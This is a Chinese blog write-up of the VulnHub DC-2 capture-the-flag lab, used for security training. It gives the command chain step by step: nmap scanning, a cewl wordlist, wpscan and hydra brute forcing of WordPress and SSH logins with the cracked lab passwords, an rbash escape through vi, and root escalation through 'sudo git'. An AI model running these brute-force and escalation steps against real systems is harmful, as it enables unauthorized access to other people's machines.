zoukankan      html  css  js  c++  java
  • vulnhub靶机DC2记录

    0x00 靶机详情

    下载地址:https://download.vulnhub.com/dc/DC-2.zip

    根据描述,和DC-1一样,需要找到5个flag

     

    0x01 靶机练习

    nmap探测存活主机

    nmap -sP 192.168.217.0/24

    查到靶机ip为192.168.217.130

    nmap扫描开放端口

    nmap -A -T4 -p- 192.168.217.130

    开放了80(http)和7744(ssh)端口

    访问靶机主页

    找到Flag1

    根据提示,需要使用Cewl工具制作密码字典,登录后查看下一个flag

    使用Cewl生成密码字典

    cewl dc-2 -w dc2pass.txt

    网站使用的CMS是wordpress,可以使用wpscan工具对该CMS进行扫描

    使用wpscan扫描网站用户

    wpscan --url http://dc-2 -e u
    

    发现三个用户名:admin、jerry、tom,使用用这三个用户名生成用户字典进行爆破

    访问wordpress默认后台/wp-login.php,找到后台登录界面

    使用wpscan爆破用户密码

    wpscan --url http://dc-2 -U dc2user.txt -P dc2pass.txt 
    

    成功爆破出jerry和tom用户密码

    使用这两个用户进行登录

    jerry用户下找到Flag2

    根据提示,需要找到另一个切入点,所以可能需要从另一个7744(ssh)端口入手

    使用hydra工具爆破ssh

    hydra -L dc2user.txt -P dc2pass.txt  -vV 192.168.217.130  -s 7744 ssh

    成功爆破出用户名:tom 密码:parturient

     使用tom用户登录ssh

    ssh tom@192.168.217.130 -p 7744
    

    登录ssh后发现 Flag3,cat查看失败,发现被限制了。经查找,需要绕过rbash

    Restricted shell绕过

    尝试发现vi可以使用

    执行命令

    vi 1
    :set shell =/bin/sh
    :shell(执行完上一条再执行)
    export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (设置环境变量)
    

    成功读取Flag3

    提示中提到jerry和su,尝试切换到jerry用户

    使用之前爆破出的web下jerry用户密码:adipiscing 成功登录

    在jerry用户根目录下,发现Flag4,直接查看

    根据提示需要使用git命令

    git提权 

    sudo -l          #查看可以无密码使用root权限的命令
    sudo git help config  #提权
    !/bin/sh
    

    成功提权

    在根目录发现最终Flag

  • 相关阅读:
    exchart点击事件,空白无值也能点击触发
    两个界面来回切换展示(左下角 有小demo)
    警告滚动展示
    Oracle高级查询之OVER (PARTITION BY ..)
    解决安装office2007后,原来的*.doc文件的图标变成缩略图
    几个常用的文本处理shell 命令:find、grep、sort、uniq、sed、awk
    CentOS 7.3 安装配置 Nginx
    MySQL5.7.17源码编译安装与配置
    CentOS 7 源码安装 MySQL5.7
    Java命令学习系列(一)——Jps
  • 原文地址:https://www.cnblogs.com/Cl0wn/p/12922194.html
Copyright © 2011-2022 走看看